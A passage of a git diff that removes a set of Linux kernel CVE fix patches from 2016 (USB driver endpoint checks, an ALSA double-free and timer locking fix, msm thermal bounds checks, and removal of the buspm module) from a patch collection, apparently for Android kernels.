-+		dev_err(&interface->dev, "%s(): need 2 interfaces, found %d\n",
-+			__func__, udev->actconfig->desc.bNumInterfaces);
-+		r = -ENODEV;
-+		goto fail1;
-+	}
-+
- 	r = usb_driver_claim_interface(&ati_remote2_driver, ar2->intf[1], ar2);
- 	if (r)
- 		goto fail1;
-+
-+	/* Sanity check, second interface must have an endpoint */
- 	alt = ar2->intf[1]->cur_altsetting;
-+	if (alt->desc.bNumEndpoints < 1 || !alt->endpoint) {
-+		dev_err(&interface->dev,
-+			"%s(): interface 1 must have an endpoint\n", __func__);
-+		r = -ENODEV;
-+		goto fail2;
-+	}
- 	ar2->ep[1] = &alt->endpoint[0].desc;
- 
- 	r = ati_remote2_urb_init(ar2);
- 	if (r)
--		goto fail2;
-+		goto fail3;
- 
- 	ar2->channel_mask = channel_mask;
- 	ar2->mode_mask = mode_mask;
- 
- 	r = ati_remote2_setup(ar2, ar2->channel_mask);
- 	if (r)
--		goto fail2;
-+		goto fail3;
- 
- 	usb_make_path(udev, ar2->phys, sizeof(ar2->phys));
- 	strlcat(ar2->phys, "/input0", sizeof(ar2->phys));
-@@ -845,11 +868,11 @@ static int ati_remote2_probe(struct usb_interface *interface, const struct usb_d
- 
- 	r = sysfs_create_group(&udev->dev.kobj, &ati_remote2_attr_group);
- 	if (r)
--		goto fail2;
-+		goto fail3;
- 
- 	r = ati_remote2_input_init(ar2);
- 	if (r)
--		goto fail3;
-+		goto fail4;
- 
- 	usb_set_intfdata(interface, ar2);
- 
-@@ -857,10 +880,11 @@ static int ati_remote2_probe(struct usb_interface *interface, const struct usb_d
- 
- 	return 0;
- 
-- fail3:
-+ fail4:
- 	sysfs_remove_group(&udev->dev.kobj, &ati_remote2_attr_group);
-- fail2:
-+ fail3:
- 	ati_remote2_urb_cleanup(ar2);
-+ fail2:
- 	usb_driver_release_interface(&ati_remote2_driver, ar2->intf[1]);
-  fail1:
- 	kfree(ar2);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2186/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2186/ANY/0001.patch
deleted file mode 100644
index bfc78434..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2186/ANY/0001.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From 9c6ba456711687b794dcf285856fc14e2c76074f Mon Sep 17 00:00:00 2001
-From: Josh Boyer <jwboyer@fedoraproject.org>
-Date: Mon, 14 Mar 2016 09:33:40 -0700
-Subject: Input: powermate - fix oops with malicious USB descriptors
-
-The powermate driver expects at least one valid USB endpoint in its
-probe function.  If given malicious descriptors that specify 0 for
-the number of endpoints, it will crash.  Validate the number of
-endpoints on the interface before using them.
-
-The full report for this issue can be found here:
-http://seclists.org/bugtraq/2016/Mar/85
-
-Reported-by: Ralf Spenneberg <ralf@spenneberg.net>
-Cc: stable <stable@vger.kernel.org>
-Signed-off-by: Josh Boyer <jwboyer@fedoraproject.org>
-Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
----
- drivers/input/misc/powermate.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/drivers/input/misc/powermate.c b/drivers/input/misc/powermate.c
-index 63b539d..84909a1 100644
---- a/drivers/input/misc/powermate.c
-+++ b/drivers/input/misc/powermate.c
-@@ -307,6 +307,9 @@ static int powermate_probe(struct usb_interface *intf, const struct usb_device_i
- 	int error = -ENOMEM;
- 
- 	interface = intf->cur_altsetting;
-+	if (interface->desc.bNumEndpoints < 1)
-+		return -EINVAL;
-+
- 	endpoint = &interface->endpoint[0].desc;
- 	if (!usb_endpoint_is_int_in(endpoint))
- 		return -EIO;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2187/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2187/ANY/0001.patch
deleted file mode 100644
index d6b97d0d..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2187/ANY/0001.patch
+++ /dev/null
@@ -1,56 +0,0 @@
-From 162f98dea487206d9ab79fc12ed64700667a894d Mon Sep 17 00:00:00 2001
-From: Vladis Dronov <vdronov@redhat.com>
-Date: Thu, 31 Mar 2016 10:53:42 -0700
-Subject: Input: gtco - fix crash on detecting device without endpoints
-
-The gtco driver expects at least one valid endpoint. If given malicious
-descriptors that specify 0 for the number of endpoints, it will crash in
-the probe function. Ensure there is at least one endpoint on the interface
-before using it.
-
-Also let's fix a minor coding style issue.
-
-The full correct report of this issue can be found in the public
-Red Hat Bugzilla:
-
-https://bugzilla.redhat.com/show_bug.cgi?id=1283385
-
-Reported-by: Ralf Spenneberg <ralf@spenneberg.net>
-Signed-off-by: Vladis Dronov <vdronov@redhat.com>
-Cc: stable@vger.kernel.org
-Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
----
- drivers/input/tablet/gtco.c | 10 +++++++++-
- 1 file changed, 9 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/input/tablet/gtco.c b/drivers/input/tablet/gtco.c
-index 3a7f3a4..7c18249 100644
---- a/drivers/input/tablet/gtco.c
-+++ b/drivers/input/tablet/gtco.c
-@@ -858,6 +858,14 @@ static int gtco_probe(struct usb_interface *usbinterface,
- 		goto err_free_buf;
- 	}
- 
-+	/* Sanity check that a device has an endpoint */
-+	if (usbinterface->altsetting[0].desc.bNumEndpoints < 1) {
-+		dev_err(&usbinterface->dev,
-+			"Invalid number of endpoints\n");
-+		error = -EINVAL;
-+		goto err_free_urb;
-+	}
-+
- 	/*
- 	 * The endpoint is always altsetting 0, we know this since we know
- 	 * this device only has one interrupt endpoint
-@@ -879,7 +887,7 @@ static int gtco_probe(struct usb_interface *usbinterface,
- 	 * HID report descriptor
- 	 */
- 	if (usb_get_extra_descriptor(usbinterface->cur_altsetting,
--				     HID_DEVICE_TYPE, &hid_desc) != 0){
-+				     HID_DEVICE_TYPE, &hid_desc) != 0) {
- 		dev_err(&usbinterface->dev,
- 			"Can't retrieve exta USB descriptor to get hid report descriptor length\n");
- 		error = -EIO;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2188/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2188/ANY/0001.patch
deleted file mode 100644
index 1f95444c..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2188/ANY/0001.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From 4ec0ef3a82125efc36173062a50624550a900ae0 Mon Sep 17 00:00:00 2001
-From: Josh Boyer <jwboyer@fedoraproject.org>
-Date: Mon, 14 Mar 2016 10:42:38 -0400
-Subject: USB: iowarrior: fix oops with malicious USB descriptors
-
-The iowarrior driver expects at least one valid endpoint.  If given
-malicious descriptors that specify 0 for the number of endpoints,
-it will crash in the probe function.  Ensure there is at least
-one endpoint on the interface before using it.
-
-The full report of this issue can be found here:
-http://seclists.org/bugtraq/2016/Mar/87
-
-Reported-by: Ralf Spenneberg <ralf@spenneberg.net>
-Cc: stable <stable@vger.kernel.org>
-Signed-off-by: Josh Boyer <jwboyer@fedoraproject.org>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- drivers/usb/misc/iowarrior.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/usb/misc/iowarrior.c b/drivers/usb/misc/iowarrior.c
-index c6bfd13..1950e87 100644
---- a/drivers/usb/misc/iowarrior.c
-+++ b/drivers/usb/misc/iowarrior.c
-@@ -787,6 +787,12 @@ static int iowarrior_probe(struct usb_interface *interface,
- 	iface_desc = interface->cur_altsetting;
- 	dev->product_id = le16_to_cpu(udev->descriptor.idProduct);
- 
-+	if (iface_desc->desc.bNumEndpoints < 1) {
-+		dev_err(&interface->dev, "Invalid number of endpoints\n");
-+		retval = -EINVAL;
-+		goto error;
-+	}
-+
- 	/* set up the endpoint information */
- 	for (i = 0; i < iface_desc->desc.bNumEndpoints; ++i) {
- 		endpoint = &iface_desc->endpoint[i].desc;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2188/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-2188/ANY/0002.patch
deleted file mode 100644
index 7e944dee..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2188/ANY/0002.patch
+++ /dev/null
@@ -1,56 +0,0 @@
-From b7321e81fc369abe353cf094d4f0dc2fe11ab95f Mon Sep 17 00:00:00 2001
-From: Johan Hovold <johan@kernel.org>
-Date: Tue, 7 Mar 2017 16:11:03 +0100
-Subject: USB: iowarrior: fix NULL-deref at probe
-
-Make sure to check for the required interrupt-in endpoint to avoid
-dereferencing a NULL-pointer should a malicious device lack such an
-endpoint.
-
-Note that a fairly recent change purported to fix this issue, but added
-an insufficient test on the number of endpoints only, a test which can
-now be removed.
-
-Fixes: 4ec0ef3a8212 ("USB: iowarrior: fix oops with malicious USB descriptors")
-Fixes: 946b960d13c1 ("USB: add driver for iowarrior devices.")
-Cc: stable <stable@vger.kernel.org>	# 2.6.21
-Signed-off-by: Johan Hovold <johan@kernel.org>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- drivers/usb/misc/iowarrior.c | 13 +++++++------
- 1 file changed, 7 insertions(+), 6 deletions(-)
-
-diff --git a/drivers/usb/misc/iowarrior.c b/drivers/usb/misc/iowarrior.c
-index 095778f..3ad058c 100644
---- a/drivers/usb/misc/iowarrior.c
-+++ b/drivers/usb/misc/iowarrior.c
-@@ -781,12 +781,6 @@ static int iowarrior_probe(struct usb_interface *interface,
- 	iface_desc = interface->cur_altsetting;
- 	dev->product_id = le16_to_cpu(udev->descriptor.idProduct);
- 
--	if (iface_desc->desc.bNumEndpoints < 1) {
--		dev_err(&interface->dev, "Invalid number of endpoints\n");
--		retval = -EINVAL;
--		goto error;
--	}
--
- 	/* set up the endpoint information */
- 	for (i = 0; i < iface_desc->desc.bNumEndpoints; ++i) {
- 		endpoint = &iface_desc->endpoint[i].desc;
-@@ -797,6 +791,13 @@ static int iowarrior_probe(struct usb_interface *interface,
- 			/* this one will match for the IOWarrior56 only */
- 			dev->int_out_endpoint = endpoint;
- 	}
-+
-+	if (!dev->int_in_endpoint) {
-+		dev_err(&interface->dev, "no interrupt-in endpoint found\n");
-+		retval = -ENODEV;
-+		goto error;
-+	}
-+
- 	/* we have to check the report_size often, so remember it in the endianness suitable for our machine */
- 	dev->report_size = usb_endpoint_maxp(dev->int_in_endpoint);
- 	if ((dev->interface->cur_altsetting->desc.bInterfaceNumber == 0) &&
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2384/^4.5/0001.patch b/Patches/Linux_CVEs/CVE-2016-2384/^4.5/0001.patch
deleted file mode 100644
index 3a2f4799..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2384/^4.5/0001.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From 07d86ca93db7e5cdf4743564d98292042ec21af7 Mon Sep 17 00:00:00 2001
-From: Andrey Konovalov <andreyknvl@gmail.com>
-Date: Sat, 13 Feb 2016 11:08:06 +0300
-Subject: ALSA: usb-audio: avoid freeing umidi object twice
-
-The 'umidi' object will be free'd on the error path by snd_usbmidi_free()
-when tearing down the rawmidi interface. So we shouldn't try to free it
-in snd_usbmidi_create() after having registered the rawmidi interface.
-
-Found by KASAN.
-
-Signed-off-by: Andrey Konovalov <andreyknvl@gmail.com>
-Acked-by: Clemens Ladisch <clemens@ladisch.de>
-Cc: <stable@vger.kernel.org>
-Signed-off-by: Takashi Iwai <tiwai@suse.de>
----
- sound/usb/midi.c | 1 -
- 1 file changed, 1 deletion(-)
-
-diff --git a/sound/usb/midi.c b/sound/usb/midi.c
-index cc39f63..007cf58 100644
---- a/sound/usb/midi.c
-+++ b/sound/usb/midi.c
-@@ -2455,7 +2455,6 @@ int snd_usbmidi_create(struct snd_card *card,
- 	else
- 		err = snd_usbmidi_create_endpoints(umidi, endpoints);
- 	if (err < 0) {
--		snd_usbmidi_free(umidi);
- 		return err;
- 	}
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2411/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2411/ANY/0001.patch
deleted file mode 100644
index 24611568..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2411/ANY/0001.patch
+++ /dev/null
@@ -1,49 +0,0 @@
-From 43e6938f37be0386fff4117e8aefff9be49bfe8a Mon Sep 17 00:00:00 2001
-From: Mahesh Sivasubramanian <msivasub@codeaurora.org>
-Date: Wed, 17 Feb 2016 14:36:32 -0700
-Subject: msm: thermal: Add range checking for cluster_id
-
-The cluster id flag is passed in from the userspace through ioctl
-interface. Ensure correctness of cluster id to avoid out of bounds array
-accesses.
-
-CRS-fixed: 977508
-Change-Id: I778b962d347b90488b983a15087b13e90ad06688
-Signed-off-by: Mahesh Sivasubramanian <msivasub@codeaurora.org>
----
- drivers/thermal/msm_thermal-dev.c | 8 +++++++-
- 1 file changed, 7 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/thermal/msm_thermal-dev.c b/drivers/thermal/msm_thermal-dev.c
-index e1032bc..e6af6b8 100644
---- a/drivers/thermal/msm_thermal-dev.c
-+++ b/drivers/thermal/msm_thermal-dev.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -114,6 +114,9 @@ static long msm_thermal_process_freq_table_req(struct msm_thermal_ioctl *query,
- 	uint32_t table_idx, idx = 0, cluster_id = query->clock_freq.cluster_num;
- 	struct clock_plan_arg *clock_freq = &(query->clock_freq);
- 
-+	if (cluster_id >= num_possible_cpus())
-+		return -EINVAL;
-+
- 	if (!freq_table_len[cluster_id]) {
- 		ret = msm_thermal_get_freq_plan_size(cluster_id,
- 			&freq_table_len[cluster_id]);
-@@ -200,6 +203,9 @@ static long msm_thermal_process_voltage_table_req(
- 	uint32_t cluster_id = query->voltage.cluster_num;
- 	struct voltage_plan_arg *voltage = &(query->voltage);
- 
-+	if (cluster_id >= num_possible_cpus())
-+		return -EINVAL;
-+
- 	if (!voltage_table_ptr[cluster_id]) {
- 		if (!freq_table_len[cluster_id]) {
- 			ret = msm_thermal_get_freq_plan_size(cluster_id,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2438/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2438/ANY/0001.patch
deleted file mode 100644
index b317ec29..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2438/ANY/0001.patch
+++ /dev/null
@@ -1,98 +0,0 @@
-From b5a663aa426f4884c71cd8580adae73f33570f0d Mon Sep 17 00:00:00 2001
-From: Takashi Iwai <tiwai@suse.de>
-Date: Thu, 14 Jan 2016 16:30:58 +0100
-Subject: [PATCH] ALSA: timer: Harden slave timer list handling
-
-A slave timer instance might be still accessible in a racy way while
-operating the master instance as it lacks of locking.  Since the
-master operation is mostly protected with timer->lock, we should cope
-with it while changing the slave instance, too.  Also, some linked
-lists (active_list and ack_list) of slave instances aren't unlinked
-immediately at stopping or closing, and this may lead to unexpected
-accesses.
-
-This patch tries to address these issues.  It adds spin lock of
-timer->lock (either from master or slave, which is equivalent) in a
-few places.  For avoiding a deadlock, we ensure that the global
-slave_active_lock is always locked at first before each timer lock.
-
-Also, ack and active_list of slave instances are properly unlinked at
-snd_timer_stop() and snd_timer_close().
-
-Last but not least, remove the superfluous call of _snd_timer_stop()
-at removing slave links.  This is a noop, and calling it may confuse
-readers wrt locking.  Further cleanup will follow in a later patch.
-
-Actually we've got reports of use-after-free by syzkaller fuzzer, and
-this hopefully fixes these issues.
-
-Reported-by: Dmitry Vyukov <dvyukov@google.com>
-Cc: <stable@vger.kernel.org>
-Signed-off-by: Takashi Iwai <tiwai@suse.de>
----
- sound/core/timer.c | 18 ++++++++++++++----
- 1 file changed, 14 insertions(+), 4 deletions(-)
-
-diff --git a/sound/core/timer.c b/sound/core/timer.c
-index 3810ee8f12051..4e8d7bfffff6b 100644
---- a/sound/core/timer.c
-+++ b/sound/core/timer.c
-@@ -215,11 +215,13 @@ static void snd_timer_check_master(struct snd_timer_instance *master)
- 		    slave->slave_id == master->slave_id) {
- 			list_move_tail(&slave->open_list, &master->slave_list_head);
- 			spin_lock_irq(&slave_active_lock);
-+			spin_lock(&master->timer->lock);
- 			slave->master = master;
- 			slave->timer = master->timer;
- 			if (slave->flags & SNDRV_TIMER_IFLG_RUNNING)
- 				list_add_tail(&slave->active_list,
- 					      &master->slave_active_head);
-+			spin_unlock(&master->timer->lock);
- 			spin_unlock_irq(&slave_active_lock);
- 		}
- 	}
-@@ -346,15 +348,18 @@ int snd_timer_close(struct snd_timer_instance *timeri)
- 		    timer->hw.close)
- 			timer->hw.close(timer);
- 		/* remove slave links */
-+		spin_lock_irq(&slave_active_lock);
-+		spin_lock(&timer->lock);
- 		list_for_each_entry_safe(slave, tmp, &timeri->slave_list_head,
- 					 open_list) {
--			spin_lock_irq(&slave_active_lock);
--			_snd_timer_stop(slave, 1, SNDRV_TIMER_EVENT_RESOLUTION);
- 			list_move_tail(&slave->open_list, &snd_timer_slave_list);
- 			slave->master = NULL;
- 			slave->timer = NULL;
--			spin_unlock_irq(&slave_active_lock);
-+			list_del_init(&slave->ack_list);
-+			list_del_init(&slave->active_list);
- 		}
-+		spin_unlock(&timer->lock);
-+		spin_unlock_irq(&slave_active_lock);
- 		mutex_unlock(&register_mutex);
- 	}
-  out:
-@@ -441,9 +446,12 @@ static int snd_timer_start_slave(struct snd_timer_instance *timeri)
- 
- 	spin_lock_irqsave(&slave_active_lock, flags);
- 	timeri->flags |= SNDRV_TIMER_IFLG_RUNNING;
--	if (timeri->master)
-+	if (timeri->master && timeri->timer) {
-+		spin_lock(&timeri->timer->lock);
- 		list_add_tail(&timeri->active_list,
- 			      &timeri->master->slave_active_head);
-+		spin_unlock(&timeri->timer->lock);
-+	}
- 	spin_unlock_irqrestore(&slave_active_lock, flags);
- 	return 1; /* delayed start */
- }
-@@ -489,6 +497,8 @@ static int _snd_timer_stop(struct snd_timer_instance * timeri,
- 		if (!keep_flag) {
- 			spin_lock_irqsave(&slave_active_lock, flags);
- 			timeri->flags &= ~SNDRV_TIMER_IFLG_RUNNING;
-+			list_del_init(&timeri->ack_list);
-+			list_del_init(&timeri->active_list);
- 			spin_unlock_irqrestore(&slave_active_lock, flags);
- 		}
- 		goto __end;
diff --git a/Patches/Linux_CVEs/CVE-2016-2441/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2441/ANY/0001.patch
deleted file mode 100644
index ababce7e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2441/ANY/0001.patch
+++ /dev/null
@@ -1,605 +0,0 @@
-From 6fb29c4773f632b7b6c31a8de56f55c32de3d350 Mon Sep 17 00:00:00 2001
-From: Kiran Gunda <kgunda@codeaurora.org>
-Date: Mon, 29 Feb 2016 13:27:50 +0530
-Subject: msm: msm_bus: remove the buspm module from kernel
-
-Remove the buspm module from msm_bus since it adds
-no functionality to the bus bandwidth aggregation
-driver. It is a loadable module used for profiling
-purposes.
-
-Change-Id: Ia0d21eb7e48d3cb2a74d4fae5ee4fb2fd449ea9f
-Signed-off-by: Kiran Gunda <kgunda@codeaurora.org>
----
- arch/arm/configs/msm8909_defconfig                 |   1 -
- arch/arm/configs/msm8909w-perf_defconfig           |   1 -
- arch/arm/configs/msm8909w_defconfig                |   1 -
- arch/arm/configs/msm8937-perf_defconfig            |   1 -
- arch/arm/configs/msm8937_defconfig                 |   1 -
- arch/arm/configs/msmcortex-perf_defconfig          |   1 -
- arch/arm/configs/msmcortex_defconfig               |   1 -
- arch/arm64/configs/msm-perf_defconfig              |   1 -
- arch/arm64/configs/msm8937-perf_defconfig          |   1 -
- arch/arm64/configs/msm8937_defconfig               |   1 -
- arch/arm64/configs/msm_defconfig                   |   1 -
- arch/arm64/configs/msmcortex-perf_defconfig        |   1 -
- arch/arm64/configs/msmcortex_defconfig             |   1 -
- drivers/platform/msm/Kconfig                       |   9 -
- drivers/platform/msm/msm_bus/Makefile              |   1 -
- drivers/platform/msm/msm_bus/msm-buspm-dev.c       | 368 ---------------------
- .../msm/msm_bus/msm_buspm_coresight_adhoc.c        |   1 +
- 17 files changed, 1 insertion(+), 391 deletions(-)
-
-diff --git a/arch/arm/configs/msm8909_defconfig b/arch/arm/configs/msm8909_defconfig
-index a8ab18c..e2621aa 100644
---- a/arch/arm/configs/msm8909_defconfig
-+++ b/arch/arm/configs/msm8909_defconfig
-@@ -383,7 +383,6 @@ CONFIG_ANDROID_LOW_MEMORY_KILLER=y
- CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_REVID=y
- CONFIG_SPS=y
-diff --git a/arch/arm/configs/msm8909w-perf_defconfig b/arch/arm/configs/msm8909w-perf_defconfig
-index e6a2585..435f97e 100644
---- a/arch/arm/configs/msm8909w-perf_defconfig
-+++ b/arch/arm/configs/msm8909w-perf_defconfig
-@@ -407,7 +407,6 @@ CONFIG_ANDROID_LOW_MEMORY_KILLER=y
- CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_POWER_ON=y
- CONFIG_QPNP_REVID=y
-diff --git a/arch/arm/configs/msm8909w_defconfig b/arch/arm/configs/msm8909w_defconfig
-index 7e4d0308d..2a8c354 100644
---- a/arch/arm/configs/msm8909w_defconfig
-+++ b/arch/arm/configs/msm8909w_defconfig
-@@ -409,7 +409,6 @@ CONFIG_ANDROID_LOW_MEMORY_KILLER=y
- CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_POWER_ON=y
- CONFIG_QPNP_REVID=y
-diff --git a/arch/arm/configs/msm8937-perf_defconfig b/arch/arm/configs/msm8937-perf_defconfig
-index fd0c4e9..48c10c8 100644
---- a/arch/arm/configs/msm8937-perf_defconfig
-+++ b/arch/arm/configs/msm8937-perf_defconfig
-@@ -471,7 +471,6 @@ CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_AVTIMER=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_POWER_ON=y
- CONFIG_QPNP_REVID=y
-diff --git a/arch/arm/configs/msm8937_defconfig b/arch/arm/configs/msm8937_defconfig
-index 0c3e1d1..0d89f31 100644
---- a/arch/arm/configs/msm8937_defconfig
-+++ b/arch/arm/configs/msm8937_defconfig
-@@ -478,7 +478,6 @@ CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_AVTIMER=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_POWER_ON=y
- CONFIG_QPNP_REVID=y
-diff --git a/arch/arm/configs/msmcortex-perf_defconfig b/arch/arm/configs/msmcortex-perf_defconfig
-index f41e11d..be65d54 100644
---- a/arch/arm/configs/msmcortex-perf_defconfig
-+++ b/arch/arm/configs/msmcortex-perf_defconfig
-@@ -474,7 +474,6 @@ CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_AVTIMER=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_POWER_ON=y
- CONFIG_QPNP_REVID=y
-diff --git a/arch/arm/configs/msmcortex_defconfig b/arch/arm/configs/msmcortex_defconfig
-index 3306d6c..c58a80a 100644
---- a/arch/arm/configs/msmcortex_defconfig
-+++ b/arch/arm/configs/msmcortex_defconfig
-@@ -475,7 +475,6 @@ CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_AVTIMER=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_POWER_ON=y
- CONFIG_QPNP_REVID=y
-diff --git a/arch/arm64/configs/msm-perf_defconfig b/arch/arm64/configs/msm-perf_defconfig
-index c2c0232..05efc6f 100644
---- a/arch/arm64/configs/msm-perf_defconfig
-+++ b/arch/arm64/configs/msm-perf_defconfig
-@@ -479,7 +479,6 @@ CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_AVTIMER=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_POWER_ON=y
- CONFIG_QPNP_REVID=y
-diff --git a/arch/arm64/configs/msm8937-perf_defconfig b/arch/arm64/configs/msm8937-perf_defconfig
-index c697e1f..e10acc8 100644
---- a/arch/arm64/configs/msm8937-perf_defconfig
-+++ b/arch/arm64/configs/msm8937-perf_defconfig
-@@ -484,7 +484,6 @@ CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_AVTIMER=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_POWER_ON=y
- CONFIG_QPNP_REVID=y
-diff --git a/arch/arm64/configs/msm8937_defconfig b/arch/arm64/configs/msm8937_defconfig
-index b05e721c..3342d55 100644
---- a/arch/arm64/configs/msm8937_defconfig
-+++ b/arch/arm64/configs/msm8937_defconfig
-@@ -488,7 +488,6 @@ CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_AVTIMER=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_POWER_ON=y
- CONFIG_QPNP_REVID=y
-diff --git a/arch/arm64/configs/msm_defconfig b/arch/arm64/configs/msm_defconfig
-index 3d907ce..7054eb2 100644
---- a/arch/arm64/configs/msm_defconfig
-+++ b/arch/arm64/configs/msm_defconfig
-@@ -485,7 +485,6 @@ CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_AVTIMER=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_DEBUG_BUS_VOTER=y
- CONFIG_QPNP_POWER_ON=y
-diff --git a/arch/arm64/configs/msmcortex-perf_defconfig b/arch/arm64/configs/msmcortex-perf_defconfig
-index b3292ed..d0b9681 100644
---- a/arch/arm64/configs/msmcortex-perf_defconfig
-+++ b/arch/arm64/configs/msmcortex-perf_defconfig
-@@ -487,7 +487,6 @@ CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_AVTIMER=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_POWER_ON=y
- CONFIG_QPNP_REVID=y
-diff --git a/arch/arm64/configs/msmcortex_defconfig b/arch/arm64/configs/msmcortex_defconfig
-index a0176f1..8d449f9 100644
---- a/arch/arm64/configs/msmcortex_defconfig
-+++ b/arch/arm64/configs/msmcortex_defconfig
-@@ -491,7 +491,6 @@ CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_AVTIMER=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_POWER_ON=y
- CONFIG_QPNP_REVID=y
-diff --git a/drivers/platform/msm/Kconfig b/drivers/platform/msm/Kconfig
-index d1fabe1..b0a9a54 100644
---- a/drivers/platform/msm/Kconfig
-+++ b/drivers/platform/msm/Kconfig
-@@ -16,15 +16,6 @@ config MSM_BUS_SCALING
- 		for the active devices needs without keeping the clocks at max
- 		frequency when a slower speed is sufficient.
- 
--config MSM_BUSPM_DEV
--	tristate "MSM Bus Performance Monitor Kernel Module"
--	depends on MSM_BUS_SCALING
--	help
--	  This kernel module is used to mmap() hardware registers for the
--	  performance monitors, counters, etc. The module can also be used to
--	  allocate physical memory which is used by bus performance hardware to
--	  dump performance data
--
- config BUS_TOPOLOGY_ADHOC
- 	bool "ad-hoc bus scaling topology"
- 	help
-diff --git a/drivers/platform/msm/msm_bus/Makefile b/drivers/platform/msm/msm_bus/Makefile
-index fec4537..a58994d 100644
---- a/drivers/platform/msm/msm_bus/Makefile
-+++ b/drivers/platform/msm/msm_bus/Makefile
-@@ -24,4 +24,3 @@ endif
- 
- 
- obj-$(CONFIG_DEBUG_FS) += msm_bus_dbg.o
--obj-$(CONFIG_MSM_BUSPM_DEV) += msm-buspm-dev.o
-diff --git a/drivers/platform/msm/msm_bus/msm-buspm-dev.c b/drivers/platform/msm/msm_bus/msm-buspm-dev.c
-index 4d9262b..e69de29 100644
---- a/drivers/platform/msm/msm_bus/msm-buspm-dev.c
-+++ b/drivers/platform/msm/msm_bus/msm-buspm-dev.c
-@@ -1,368 +0,0 @@
--/* Copyright (c) 2011-2015, The Linux Foundation. All rights reserved.
-- *
-- * This program is free software; you can redistribute it and/or modify
